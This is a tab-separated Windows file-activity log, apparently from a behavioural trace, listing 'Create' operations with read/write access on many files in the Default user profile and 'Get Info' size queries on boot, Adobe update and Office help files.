Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Temp\FXSAPIDebugLogFile.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Media Player.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\index.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1b4dd67f29cb1962.customDestinations-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5afe4de1b92fc382.customDestinations-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7e4dca80246863e3.customDestinations-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Documents.mydocs	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Contacts\Administrator.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Contacts\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Desktop\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Documents\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Downloads\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Links\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Links\Web Slice Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Autos.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Money.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Sports.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSNBC News.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Get Windows Live.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Links\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Links\Desktop.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Links\Downloads.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Links\RecentPlaces.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Music\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\NTUSER.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\NTUSER.DAT.LOG	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\NTUSER.DAT.LOG1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\NTUSER.DAT.LOG2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\ntuser.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Pictures\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Saved Games\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Searches\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Searches\Everywhere.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Searches\Indexed Locations.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Videos\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Boot\BCD.LOG1	type = size	1	Fn
Get Info	C:\Boot\BCD.LOG2	type = size	1	Fn
Get Info	C:\Boot\BOOTSTAT.DAT	type = size	1	Fn
Get Info	C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrSecUpd10111.msp	type = size	1	Fn
Get Info	C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrUpd10110_MUI.msp	type = size	1	Fn
Get Info	C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrUpd10116_MUI.msp	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\Hx.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.EXCEL.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.EXCEL.DEV.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.GRAPH.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.GROOVE.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.INFOPATH.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.INFOPATHEDITOR.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.MSACCESS.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.MSACCESS.DEV.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.MSOUC.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.MSPUB.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.MSPUB.DEV.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.MSTORE.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.OIS.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.ONENOTE.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.OUTLOOK.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.OUTLOOK.DEV.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.POWERPNT.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.POWERPNT.DEV.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.SETLANG.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.VISIO.14.1033.hxn	type = size	1	Fn
